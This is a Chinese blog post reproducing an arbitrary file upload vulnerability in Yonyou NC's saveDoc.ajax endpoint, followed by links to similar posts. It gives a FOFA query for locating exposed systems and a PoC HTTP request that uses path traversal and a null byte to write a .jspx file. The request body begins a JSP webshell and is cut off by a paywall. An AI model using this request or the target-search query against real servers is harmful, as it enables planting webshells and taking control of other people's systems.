用友nc-sacedoc文件上传漏洞

已于 2024-03-27 10:03:04 修改
阅读量235 收藏
点赞数 8
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-27 09:55:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137067977
版权

0x01 漏洞分析

用友NC 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。

image.png

通过MethodInvocationHandler类中的异常处理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口

0x02 漏洞复现

fofa语法:title="产品登录界面"

影响范围:
包括了nc所有版本

poc:

POST /uapws/saveDoc.ajax?ws=/../../1x8ty.jspx%00 HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

content=<hi xmlns:hi="http://java.sun.com/JSP/Page">
      <hi:directive.page import="java.util.*,java.io.*,java.net.*"/>
  <hi:scriptlet>
            out
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 8
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】用友NC-任意文件上传-uploadFile
知黑而守白
05-05 205
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
用友NC saveDoc.ajax 任意文件上传漏洞复现
Keepb1ue的博客
03-06 899
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
UAP开发中遇到的问题
四叶猫的博客
06-09 3598
1.Failed to set property: vbillstatus at bean…… vbillstatus参数类型错误,在主子表开发中,元数据中的“单据状态”的数据库映射字段必须为int类型,不能是varchar(虽然在VO中这个字段是String),否则会报这个错误。 2. ...
nc65 关于uapws模块启用
guaizang的博客
08-06 1567
如果有代码洁癖比如我,在65环境写ws接口时,喜欢将接口发布在uapws模块下,这样接口比较多的时候,就不用分模块建项目了,但是65没有这个模块了,所以要新建,这里讲一个容易忽视的坑,在抽补丁的时候容易,把module.xml文件漏了,导致接口无法部署ejb,所以在测试或者生产环境无法访问。 ...
【复现】用友NC-Cloud文件上传漏洞_70
fushuang333的博客
04-10 722
【复现】用友NC-Cloud文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
漏洞复现】用友 NC-Cloud uploadChunk 任意文件上传漏洞
凝聚力安全团队
06-24 408
用友 NC-Cloud uploadChunk 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友NC-Cloud uploadChunk 任意文件上传漏洞
CommputerMac的博客
10-17 1013
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
用友UFIDA-NC-saveDoc任意文件上传漏洞
qq_36334672的博客
03-08 481
用友-UFIDA-NC saveDoc.ajax 存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,获取系统权限。
用友NC grouptemplet 存在任意文件上传漏洞
wan___she__pi的博客
04-29 415
用友NC 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友NC-UAP平台介绍
11-09
UAP平台介绍,产业背景、平台整体介绍、UAP平台介绍、平台性能与稳定性、平台产业链与典型客户
用友NC-上云解决方案.pptx
06-15
用友NC-上云解决方案 用友NC-上云解决方案旨在帮助企业实现管理转型升级,提供涵盖财务、供应链、制造、营销、人力资本等 7 大领域, 23 个细分领域的行业实践。该方案基于创新打造简单、稳定、安全、易用的云 IT ...
用友-PRD-NC-V6.3-流程管理.pdf
03-29
"用友PRD-NC-V6.3流程管理" 用友PRD-NC-V6.3流程管理系统是用友软件股份有限公司开发的一款流程管理软件,旨在帮助企业更好地管理和优化业务流程。下面是该系统的详细知识点: 1.1 产品概貌:用友PRD-NC-V6.3流程...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 838
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础与数据库教学下(超详细)
最新发布
weixin_60838266的博客
07-29 990
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 741
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
网络安全相关竞赛比赛
黑战士的博客
07-18 1512
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
用友NC-UAP平台:统一应用,打造企业软件生态
"用友NC-UAP平台是一个综合性的企业级应用平台,由用友软件股份有限公司开发,旨在提供统一的应用开发、集成、运行和管理功能。该平台涵盖了软件全生命周期,包括设计模型、模板、开发工具、应用框架、中间件、基础...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值